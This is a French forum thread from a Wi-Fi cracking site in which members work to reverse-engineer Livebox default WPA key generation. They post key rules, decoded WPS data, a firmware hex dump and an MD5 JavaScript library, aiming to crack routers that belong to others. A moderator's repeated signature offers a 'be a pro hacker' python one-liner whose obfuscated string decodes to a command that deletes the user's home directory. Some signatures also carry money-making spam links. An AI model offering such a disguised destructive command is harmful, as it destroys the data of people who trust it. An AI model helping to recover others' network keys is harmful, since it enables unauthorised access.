Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#576 19-09-2011 05:54:53

Mikaye
Membre Indéboulonnable
Inscription : 05-08-2011
Messages : 129
Site Web

Re : Retravailler des clé Livebox

Entre temps j'ai modifié les regles 5, 6 et 9... Donc dans mon test, on peut avoir 5 lettres d'affilé, 4 fois le meme caractère et 12 chiffres à la suite...


LiveDico - Générateur de clés WPA Livebox

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#577 19-09-2011 06:22:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Retravailler des clé Livebox

Merci Mikaye, ça correspond déga plus aux nouvelles clés, sinon que diriez vous d'incorporer un dico sur l'essid créer a partir de ce que l'on a déja? exemple:

Un membre rentre le nom de sa livebox disons la 67c8 dans le programme alors le programme va lui créer un dico entre 13C et 16C en fonction des livebox de valeur en chiffre/lettre inférieur et supérieur (dans ce cas la Livebox-65c9 et Livebox-754e).

En Ligne

#578 19-09-2011 06:48:58

Mikaye
Membre Indéboulonnable
Inscription : 05-08-2011
Messages : 129
Site Web

Re : Retravailler des clé Livebox

Moi je suis contre (bien que j'avais déjà commencé à mettre un truc de ce genre dans le code) car on ne sait pas du tout si les clés entre les clés connues respectent ces regles... Ça serait dommage d'éliminer trop de clés...


LiveDico - Générateur de clés WPA Livebox

Hors Ligne

#579 19-09-2011 14:43:50

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Retravailler des clé Livebox

J'ai oublier de remercier pour les clés smile et de parler de cela

Firmware 3202_210103  // Livebox-a9c1  LK11119DP240103

Ce qui semble appuyer Spawn pour l'affaire des  "numéro de version majeur"

Dernière modification par vances1 (20-09-2011 11:17:39)


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#580 19-09-2011 17:22:03

franckt13
Membre Radioactif
Inscription : 29-07-2011
Messages : 68

Re : Retravailler des clé Livebox

koala a écrit :

Je reprend ce qu'a dit franck ici et je me permet de vous demander de taper le code suivant

iwlist wlan0 scan

dans votre terminal et poster le résultat concernant les livebox sur le forum pour avoir un max d'info sur ce IE unkown.Il faut savoir que autour de moi j'ai une dartybox et une neufbox d'assez bon signal et que pour les 2, malgrès le long IE unkown qui apparait, nul part figure l'essid comme pour les livebox de sagem.En parlant de livebox j'ai pu choper l'ie unkown d'une livebox toute a l'heure en comparaison avec la livebox 1d2e dont j'ai la clé voici les 2 ie unkown:

Livebox-c12d
DD880050F204104A000110104400010210570001001041000100103B000103104700--10E8BE810EC12DE8BE810EC12D810EC12D--10210005536167656D102300084C697665626F7832102400084C697665626F78321042000A4C4B31303232374450331054000800060050F20400011011000D4C697665626F78322D43313244100800020086103C000101
Livebox-1d2e dont on a la clé
DD880050F204104A000110104400010210570001001041000100103B000103104700--10001F95321D2E001F95321D2E95321D2E--10210005536167656D102300084C697665626F7832102400084C697665626F78321042000A4C4B31303137374450341054000800060050F20400011011000D4C697665626F78322D3144324510080002000A103C000101

La partie séparé par des tirés et unique a chaque box apparemment, plus sa va plus je pense que cette essid et lié a la clé.

Voici le décodage :

Livebox-c12d
DD880050F204104A000110104400010210570001001041000100103B000103104700--10E8BE810EC12DE8BE810EC12D810EC12D--10210005536167656D102300084C697665626F7832102400084C697665626F78321042000A4C4B31303232374450331054000800060050F20400011011000D4C697665626F78322D43313244100800020086103C000101

1047 UUID
0010
E8BE810EC12DE8BE810EC12D810EC12D --> E8:BE:81:0E:C1:2D
1021 Constructeur
0005
536167656D Sagem
1023 Model Name
0008
4C697665626F7832 Livebox2
1024
0008 Model number
4C697665626F7832 Livebox2
1042 Serial Number
000A
4C4B3130323237445033 LK10227DP3
1011
000D
4C697665626F78322D43313244 Livebox2-C12D

---------------------------------------------------------------------------------

Livebox-1d2e dont on a la clé
DD880050F204104A000110104400010210570001001041000100103B000103104700--10001F95321D2E001F95321D2E95321D2E--10210005536167656D102300084C697665626F7832102400084C697665626F78321042000A4C4B31303137374450341054000800060050F20400011011000D4C697665626F78322D3144324510080002000A103C000101

1047 UUID
0010
001F95321D2E001F95321D2E95321D2E --> 00:1F:95:32:1D:2E
1021 Constructeur
0005
536167656D Sagem
1023 Model Name
0008
4C697665626F7832 Livebox2
1024
0008 Model number
4C697665626F7832 Livebox2
1042 Serial Number
000A
4C4B3130313737445034 LK10177DP4
1011
000D
4C697665626F78322D31443245 Livebox2-1D2E

On retrouve donc bien le S/N que l'on connait et comme je l'avais dékà fait remarqué, le S/N est incomplet, il manque les 5 derniers chiffres. Faut-il penser que ces 5 derniers chiffres sont donc (les seuls ?) importants dans la recherche du lien clé - S/N - essid ?

Dernière modification par franckt13 (19-09-2011 17:24:31)

Hors Ligne

#581 19-09-2011 17:46:27

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Retravailler des clé Livebox

Un instant j'ai eu une idée flippante :
Si on a plus que 5 chiffres à la suite .. 75000 ou bien 28130 ou même 64000.. mais non, ca ne colle pas avec la récurrence extrême de 0 en sn[11]. On a eu chaud smile

Si on élimine le premier chiffre après DP (sn[9]) on a donc X0YYY (où bien sûr, le 0 est desfois un 1 sans ca, ce ne serait pas drôle.)

Je vais creuser du côté de ce que renvoie le iwlist wlan0 scan.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#582 19-09-2011 19:10:18

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Retravailler des clé Livebox

Moi je suis contre (bien que j'avais déjà commencé à mettre un truc de ce genre dans le code) car on ne sait pas du tout si les clés entre les clés connues respectent ces regles... Ça serait dommage d'éliminer trop de clés...

Le mettre en option serait pas mal, a l'utilisateur de voir si il active cette fonction... ou pas wink

En Ligne

#583 19-09-2011 19:17:59

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Retravailler des clé Livebox

@franck

1042 Serial Number
000A
4C4B3130313737445034 LK10177DP4

Les 5 autres chiffres du s/n sont cachés, donc si on les cache c'est surement qu'il y a une raison wink

En Ligne

#584 19-09-2011 19:28:44

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Retravailler des clé Livebox

Alors a votre avis c'est le firmware ou pas ? smile ça à son importance

Si oui,  faut juste que je bouge mon popotain dans ma résidence secondaire où j'ai ces 2  LiveBox qui dorment.

Avec plaisir, on n'en aura pas de trop  smile

Dernière modification par vances1 (19-09-2011 19:40:35)


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#585 19-09-2011 21:04:40

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Retravailler des clé Livebox

Pour ceux qui se posent la question, non, le pass n'est pas un hash découpé de 5 numéros cachés.
(j'ai tout essayé. -> tout (up to degree 8)) (merci colombiana ! )


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#586 19-09-2011 21:23:22

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Retravailler des clé Livebox

Ce sera surement plus complexe smile

On aurais pu l’espérer dans le cas d'un pass fixe mais si il y à possibilité de le générer c'est qu'il y à au moin une variable (heure,bruit électrique ....) avant de le crypter en md5.

EDIT

A vrai dire, il doit même surement y avoir plusieurs valeurs qui rentre en jeu + une variable.
Peux être que le début du sn (avant DP) sert dans l’équation année heure ....

A bien étudier (attention ça vient de l'inventel)

0000:0492 | 00 00 12 00  00 00 00 5F  44 59 | ......._DY
0000:049C | 4E 41 4D 49  43 00 5F 47  4C 4F | NAMIC._GLO
0000:04A6 | 42 41 4C 5F  4F 46 46 53  45 54 | BAL_OFFSET
0000:04B0 | 5F 54 41 42  4C 45 5F 00  5F 67 | _TABLE_._g
0000:04BA | 70 5F 64 69  73 70 00 5F  5F 64 | p_disp.__d
0000:04C4 | 65 73 5F 63  72 79 70 74  00 5F | es_crypt._
0000:04CE | 5F 6D 64 35  5F 63 72 79  70 74 | _md5_crypt
0000:04D8 | 00 73 65 74  6B 65 79 00  65 6E | .setkey.en
0000:04E2 | 63 72 79 70  74 00 6D 65  6D 63 | crypt.memc
0000:04EC | 70 79 00 6D  65 6D 73 65  74 00 | py.memset.
0000:04F6 | 73 74 72 6C  65 6E 00 73  74 72 | strlen.str
0000:0500 | 6E 63 6D 70  00 73 74 72  63 70 | ncmp.strcp
0000:050A | 79 00 73 74  72 6E 63 61  74 00 | y.strncat.
0000:0514 | 73 74 72 63  61 74 00 6C  69 62 | strcat.lib
0000:051E | 63 2E 73 6F  2E 30 00 5F  66 74 | c.so.0._ft
0000:0528 | 65 78 74 00  5F 66 64 61  74 61 | ext._fdata
0000:0532 | 00 5F 67 70  00 5F 65 64  61 74 | ._gp._edat
0000:053C | 61 00 5F 5F  62 73 73 5F  73 74 | a.__bss_st
0000:0546 | 61 72 74 00  5F 66 62 73  73 00 | art._fbss.
0000:0550 | 5F 65 6E 64  00 6C 69 62  63 72 | _end.libcr
0000:055A | 79 70 74 2E  73 6F 2E 30  00 00 | ypt.so.0..
--------------------------------------------------------
0000:297C | 24 06 00 10  2E 2F 30 31  32 33 | $..../0123
0000:2986 | 34 35 36 37  38 39 41 42  43 44 | 456789ABCD
0000:2990 | 45 46 47 48  49 4A 4B 4C  4D 4E | EFGHIJKLMN
0000:299A | 4F 50 51 52  53 54 55 56  57 58 | OPQRSTUVWX
0000:29A4 | 59 5A 61 62  63 64 65 66  67 68 | YZabcdefgh
0000:29AE | 69 6A 6B 6C  6D 6E 6F 70  71 72 | ijklmnopqr
0000:29B8 | 73 74 75 76  77 78 79 7A  00 00 | stuvwxyz..
0000:29C2 | 00 00 3A 32  2A 22 1A 12  0A 02 | ..:2*"....
0000:29CC | 3C 34 2C 24  1C 14 0C 04  3E 36 | <4,$....>6
0000:29D6 | 2E 26 1E 16  0E 06 40 38  30 28 | .&....@80(
0000:29E0 | 20 18 10 08  39 31 29 21  19 11 |  ...91)!..
0000:29EA | 09 01 3B 33  2B 23 1B 13  0B 03 | ..;3+#....
0000:29F4 | 3D 35 2D 25  1D 15 0D 05  3F 37 | =5-%....?7
0000:29FE | 2F 27 1F 17  0F 07 39 31  29 21 | /'....91)!
0000:2A08 | 19 11 09 01  3A 32 2A 22  1A 12 | ....:2*"..
0000:2A12 | 0A 02 3B 33  2B 23 1B 13  0B 03 | ..;3+#....
0000:2A1C | 3C 34 2C 24  3F 37 2F 27  1F 17 | <4,$?7/'..
0000:2A26 | 0F 07 3E 36  2E 26 1E 16  0E 06 | ..>6.&....
--------------------------------------------------------
0000:2D28 | 00 00 00 00  00 00 00 00  24 31 | ........$1
0000:2D32 | 24 00 2E 2F  30 31 32 33  34 35 | $../012345
0000:2D3C | 36 37 38 39  41 42 43 44  45 46 | 6789ABCDEF
0000:2D46 | 47 48 49 4A  4B 4C 4D 4E  4F 50 | GHIJKLMNOP
0000:2D50 | 51 52 53 54  55 56 57 58  59 5A | QRSTUVWXYZ
0000:2D5A | 61 62 63 64  65 66 67 68  69 6A | abcdefghij
0000:2D64 | 6B 6C 6D 6E  6F 70 71 72  73 74 | klmnopqrst
0000:2D6E | 75 76 77 78  79 7A 00 00  00 00 | uvwxyz....
--------------------------------------------------------
0000:316A | 00 1D 00 00  00 1F 00 2E  73 68 | ........sh
0000:3174 | 73 74 72 74  61 62 00 2E  72 65 | strtab..re
0000:317E | 67 69 6E 66  6F 00 2E 64  79 6E | ginfo..dyn
0000:3188 | 61 6D 69 63  00 2E 68 61  73 68 | amic..hash
0000:3192 | 00 2E 64 79  6E 73 79 6D  00 2E | ..dynsym..
0000:319C | 64 79 6E 73  74 72 00 2E  74 65 | dynstr..te
0000:31A6 | 78 74 00 2E  72 6F 64 61  74 61 | xt..rodata
0000:31B0 | 00 2E 64 61  74 61 00 2E  67 6F | ..data..go
0000:31BA | 74 00 2E 73  62 73 73 00  2E 62 | t..sbss..b
0000:31C4 | 73 73 00 2E  70 64 72 00  2E 6D | ss..pdr..m
0000:31CE | 64 65 62 75  67 2E 61 62  69 33 | debug.abi3
0000:31D8 | 32 00 00 00  00 00 00 00  00 00 | 2.........

Dernière modification par vances1 (19-09-2011 21:45:12)


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#587 19-09-2011 23:57:38

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Retravailler des clé Livebox

koala a écrit :

@franck

1042 Serial Number
000A
4C4B3130313737445034 LK10177DP4

Les 5 autres chiffres du s/n sont cachés, donc si on les cache c'est surement qu'il y a une raison wink

Coincidence ou pas, en Espagne sur un cas d'essid (ONOXXXX "nouvelle génération", avec des essids types livebox maintenant - avant c'était des essid seulement avec des chiffres)nous nous retrouvons avec 5 chiffres cachés dans le serial et nous avons aussi la conviction après étude de que ces chiffres sont très importants...
Que vous dire de plus si ce n'est qu'en espagne, l'algo de nombreuses compagnies a été mis à jour, qu'il étaient basés sur essid-bssid et quelques bidouilles. Maintenant les compagnies adoptent le meme type de bssid - comme ceux des livebox, chiffres et lettres - les pass se resssemble étrangements entre ceux d'un vodafoneXXXX, un ONOXXXX, un liveboxXXXX et un orangeXXXX et l'approche classique par essid-bssid ne donne pas de résultats.
Donc je pense comme koala que si ces caractères sont cachés, c'est pour quelque chose.

Hors Ligne

#588 20-09-2011 08:50:31

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Retravailler des clé Livebox

Reste a deviner a quoi ils servent et le format de ces 5 chiffres, DP X XX XX ou DP XX XXX

En Ligne

#589 20-09-2011 11:40:17

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Retravailler des clé Livebox

De mon coté, je suis en train de collecter tout ce que je peux trouver coté Firmware ... à premiere vus le DP5XXXXX que l'on pensais être une limite, pourrait ne pas être le plus haut DP6XXXXX/DP7XXXXX

La Livebox Pro V2
firmware LBV2_610128 et LBV2_610142.
firmware 681420
68141C pour les box en H.323  par exemple ....

Livebox-2c1c   -------DP781354   
Livebox-2d1c   -------DP720484

Si c'est le cas il y à des lettres, aussi la possibilité que ce sois de l'hexa n'est donc pas à écarter

EDIT

Forum Orange

Ont y notera leur manière de "découper" la version de firmware 260.104

Un peu de doc  smile (Certaine commande pourrais nous éclairer par la suite)

Telnet et Livebox Sagem

Dernière modification par vances1 (20-09-2011 12:22:48)


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#590 20-09-2011 12:21:43

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Retravailler des clé Livebox

Compota du forum lampiweb.com nous signale données à l'appui que la règle qui stipule que le 23 ème caractère des pass est un chiffre semble être compromise... J'ai passé des données de compota à Koala (elles ne peuvent pas être rendues publiques dans le thread) pour qu'il les partage avec vous.
Pour que nos amis ibériques puissent "jouer avec nous" (chercher des règles) j'avais pensé à un truc: les données qui sont publiées ici en "accès publique", je pourrais les mettre sur le thread du forum español si vous êtes d'accord. Comme ça les gens auront de la matière...
Donc ma question est la suivante: est-ce que je peux mettre les clefs publiées ici dans le thread español? Si oui, est-ce que vous pouvez m'indiquer où elles se trouvent (si je me rapelle bien il y a quelqu'un qui avait fait un post les récapitulant toutes)?
Un link vers le forum español où on parle de vous wink!
http://lampiweb.com/foro/index.php/topic,1770.0.html
ça comence réponse 192

Hors Ligne

#591 20-09-2011 14:06:52

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Retravailler des clé Livebox

Compota du forum lampiweb.com nous signale données à l'appui que la règle qui stipule que le 23 ème caractère des pass est un chiffre semble être compromise

Je viens de passer un petit coucou sur place smile (oui cette règle n'est plus valable ou par pourcentage à la limite).

Donc ma question est la suivante: est-ce que je peux mettre les clefs publiées ici dans le thread español?

J'imagine que oui par contre il vas falloir aller à la pêche, tu en à sur le Livedico aussi.
Mon tableau comporte maintenant pas mal de clés ne devant pas être publié et je ne sais plus lesquels :s

Une petite poignée non exhaustive de Firmware:

200228
210103
210282
220108
220142
220160  //  Livebox-8956 LK09298DP220160 02-12-2004
220188
220228
22204E  // Livebox-Fast3202 Dutch
24013A
24014C
24014E
2402C8  //  LK06 ou LK07
240312
2501B8
260104
260132
260130
26014A  // Firmware H323 // 2008
260170
2601B8
2601E2  // Firmware SIP
2601E8  // Firmware H323
260208  // Firmware SIP
26020A

                                        Ceci pourrait être une sorte de rupture

610128  // firmware LBV2,livebox pro sagem,ModemFirmwareVersion 3.0.27,LK08103DP120078,Hardversion 111
610142  // firmware LBV2
6813E4
68141C  // Firmware H323
681420  // Livebox-e0000
681494  // 1 juin 2011

Dernière modification par vances1 (20-09-2011 15:13:42)


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#592 20-09-2011 16:49:45

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Retravailler des clé Livebox

Bonjour ! Je pense qu'il y a rupture car on change de modèle de Box, et donc de firmware.

Personnellement, je trouve ca génial de partager ce que l'on a avec nos amis de l'autre côté des pyrénées.

(à Pau, la vue sur les pyrénées depuis les remparts arrache. surtout aujourd'hui)

On ne gagne rien a ne pas partager, et eux non plus. donc je vote :

+1


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#593 20-09-2011 18:03:10

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Retravailler des clé Livebox

@kcdtv

Pour que nos amis ibériques puissent "jouer avec nous" (chercher des règles) j'avais pensé à un truc: les données qui sont publiées ici en "accès publique", je pourrais les mettre sur le thread du forum español si vous êtes d'accord. Comme ça les gens auront de la matière...

En effet ça serait pas mal, concernant les clés public/privés  j'avoue que j'ai du mal a me souvenir lesquels sont a publier ou pas hmm

@vances

Un peu de doc (Certaine commande pourrais nous éclairer par la suite)

C'est de ce site dont je me sert smile mais toutes les commandes ne fonctionnent pas donc je me sert du site que je vous avez envoyé en privée au début de la recherche wink

@Spawn

Tu ma l'air captivé par ce que l'on fait ici, et si on ne te les a pas déja donnés, je ne vois pas pourquoi tu n'aurais pas le droit d'avoir les donnés priver que l'on a, veux tu que je t'envois l'intégralité des clés par mail? smile

Dernière modification par koala (20-09-2011 18:04:15)

En Ligne

#594 20-09-2011 18:18:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Retravailler des clé Livebox

Je suis partant pour que l'on "déménage" les clés public sur lampiweb (je viens de checké lesquels pouvaient etre affiché) mais avant de faire ça etes vous tous d'accord pour que ces donnés apparaissent en public la bas?

Dernière modification par koala (20-09-2011 18:19:05)

En Ligne

#595 20-09-2011 18:29:33

Rezz
Membre
Inscription : 02-09-2011
Messages : 10

Re : Retravailler des clé Livebox

Je ne comprends pas l'idée du numéro de Firmware.
Chaque livebox porte un numéro de série unique et donc ça voudrait dire que le firmware est modifié à chaque box hmm ?

Hors Ligne

#596 20-09-2011 20:05:55

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Retravailler des clé Livebox

Encore une apparition de md5 (avec un mélange de base64) dans un javascript cette fois, on ne peut rien en tirer dans l'état mais peut-etre que sa donnera des idées a certains sachant que ce mode de crypto ressort souvent dans les livebox apparement.

*
 * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
 * Digest Algorithm, as defined in RFC 1321.
 * Version 2.1 Copyright (C) Paul Johnston 1999 - 2002.
 * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
 * Distributed under the BSD License
 * See http://pajhome.org.uk/crypt/md5 for more info.
 */

/*
 * Configurable variables. You may need to tweak these to be compatible with
 * the server-side, but the defaults work in most cases.
 */
var hexcase = 0;  /* hex output format. 0 - lowercase; 1 - uppercase        */
var b64pad  = ""; /* base-64 pad character. "=" for strict RFC compliance   */
var chrsz   = 8;  /* bits per input character. 8 - ASCII; 16 - Unicode      */

/*
 * These are the functions you'll usually want to call
 * They take string arguments and return either hex or base-64 encoded strings
 */
function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));}
function b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));}
function str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));}
function hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); }
function b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); }
function str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); }

/* 
 * Perform a simple self-test to see if the VM is working 
 */
function md5_vm_test()
{
  return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72";
}

/*
 * Calculate the MD5 of an array of little-endian words, and a bit length
 */
function core_md5(x, len)
{
  /* append padding */
  x[len >> 5] |= 0x80 << ((len) % 32);
  x[(((len + 64) >>> 9) << 4) + 14] = len;
  
  var a =  1732584193;
  var b = -271733879;
  var c = -1732584194;
  var d =  271733878;

  for(var i = 0; i < x.length; i += 16)
  {
    var olda = a;
    var oldb = b;
    var oldc = c;
    var oldd = d;
 
    a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);
    d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);
    c = md5_ff(c, d, a, b, x[i+ 2], 17,  606105819);
    b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);
    a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);
    d = md5_ff(d, a, b, c, x[i+ 5], 12,  1200080426);
    c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);
    b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);
    a = md5_ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
    d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);
    c = md5_ff(c, d, a, b, x[i+10], 17, -42063);
    b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162);
    a = md5_ff(a, b, c, d, x[i+12], 7 ,  1804603682);
    d = md5_ff(d, a, b, c, x[i+13], 12, -40341101);
    c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290);
    b = md5_ff(b, c, d, a, x[i+15], 22,  1236535329);

    a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);
    d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
    c = md5_gg(c, d, a, b, x[i+11], 14,  643717713);
    b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);
    a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);
    d = md5_gg(d, a, b, c, x[i+10], 9 ,  38016083);
    c = md5_gg(c, d, a, b, x[i+15], 14, -660478335);
    b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);
    a = md5_gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
    d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);
    c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);
    b = md5_gg(b, c, d, a, x[i+ 8], 20,  1163531501);
    a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);
    d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);
    c = md5_gg(c, d, a, b, x[i+ 7], 14,  1735328473);
    b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734);

    a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);
    d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463);
    c = md5_hh(c, d, a, b, x[i+11], 16,  1839030562);
    b = md5_hh(b, c, d, a, x[i+14], 23, -35309556);
    a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
    d = md5_hh(d, a, b, c, x[i+ 4], 11,  1272893353);
    c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);
    b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640);
    a = md5_hh(a, b, c, d, x[i+13], 4 ,  681279174);
    d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);
    c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);
    b = md5_hh(b, c, d, a, x[i+ 6], 23,  76029189);
    a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);
    d = md5_hh(d, a, b, c, x[i+12], 11, -421815835);
    c = md5_hh(c, d, a, b, x[i+15], 16,  530742520);
    b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);

    a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);
    d = md5_ii(d, a, b, c, x[i+ 7], 10,  1126891415);
    c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905);
    b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);
    a = md5_ii(a, b, c, d, x[i+12], 6 ,  1700485571);
    d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);
    c = md5_ii(c, d, a, b, x[i+10], 15, -1051523);
    b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);
    a = md5_ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
    d = md5_ii(d, a, b, c, x[i+15], 10, -30611744);
    c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);
    b = md5_ii(b, c, d, a, x[i+13], 21,  1309151649);
    a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);
    d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379);
    c = md5_ii(c, d, a, b, x[i+ 2], 15,  718787259);
    b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);

    a = safe_add(a, olda);
    b = safe_add(b, oldb);
    c = safe_add(c, oldc);
    d = safe_add(d, oldd);
  }
  return Array(a, b, c, d);
  
}

/*
 * These functions implement the four basic operations the algorithm uses.
 */
function md5_cmn(q, a, b, x, s, t)
{
  return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b);
}
function md5_ff(a, b, c, d, x, s, t)
{
  return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);
}
function md5_gg(a, b, c, d, x, s, t)
{
  return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);
}
function md5_hh(a, b, c, d, x, s, t)
{
  return md5_cmn(b ^ c ^ d, a, b, x, s, t);
}
function md5_ii(a, b, c, d, x, s, t)
{
  return md5_cmn(c ^ (b | (~d)), a, b, x, s, t);
}

/*
 * Calculate the HMAC-MD5, of a key and some data
 */
function core_hmac_md5(key, data)
{
  var bkey = str2binl(key);
  if(bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz);

  var ipad = Array(16), opad = Array(16);
  for(var i = 0; i < 16; i++) 
  {
    ipad[i] = bkey[i] ^ 0x36363636;
    opad[i] = bkey[i] ^ 0x5C5C5C5C;
  }

  var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
  return core_md5(opad.concat(hash), 512 + 128);
}

/*
 * Add integers, wrapping at 2^32. This uses 16-bit operations internally
 * to work around bugs in some JS interpreters.
 */
function safe_add(x, y)
{
  var lsw = (x & 0xFFFF) + (y & 0xFFFF);
  var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
  return (msw << 16) | (lsw & 0xFFFF);
}

/*
 * Bitwise rotate a 32-bit number to the left.
 */
function bit_rol(num, cnt)
{
  return (num << cnt) | (num >>> (32 - cnt));
}

/*
 * Convert a string to an array of little-endian words
 * If chrsz is ASCII, characters >255 have their hi-byte silently ignored.
 */
function str2binl(str)
{
  var bin = Array();
  var mask = (1 << chrsz) - 1;
  for(var i = 0; i < str.length * chrsz; i += chrsz)
    bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32);
  return bin;
}

/*
 * Convert an array of little-endian words to a string
 */
function binl2str(bin)
{
  var str = "";
  var mask = (1 << chrsz) - 1;
  for(var i = 0; i < bin.length * 32; i += chrsz)
    str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
  return str;
}

/*
 * Convert an array of little-endian words to a hex string.
 */
function binl2hex(binarray)
{
  var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
  var str = "";
  for(var i = 0; i < binarray.length * 4; i++)
  {
    str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
           hex_tab.charAt((binarray[i>>2] >> ((i%4)*8  )) & 0xF);
  }
  return str;
}

/*
 * Convert an array of little-endian words to a base-64 string
 */
function binl2b64(binarray)
{
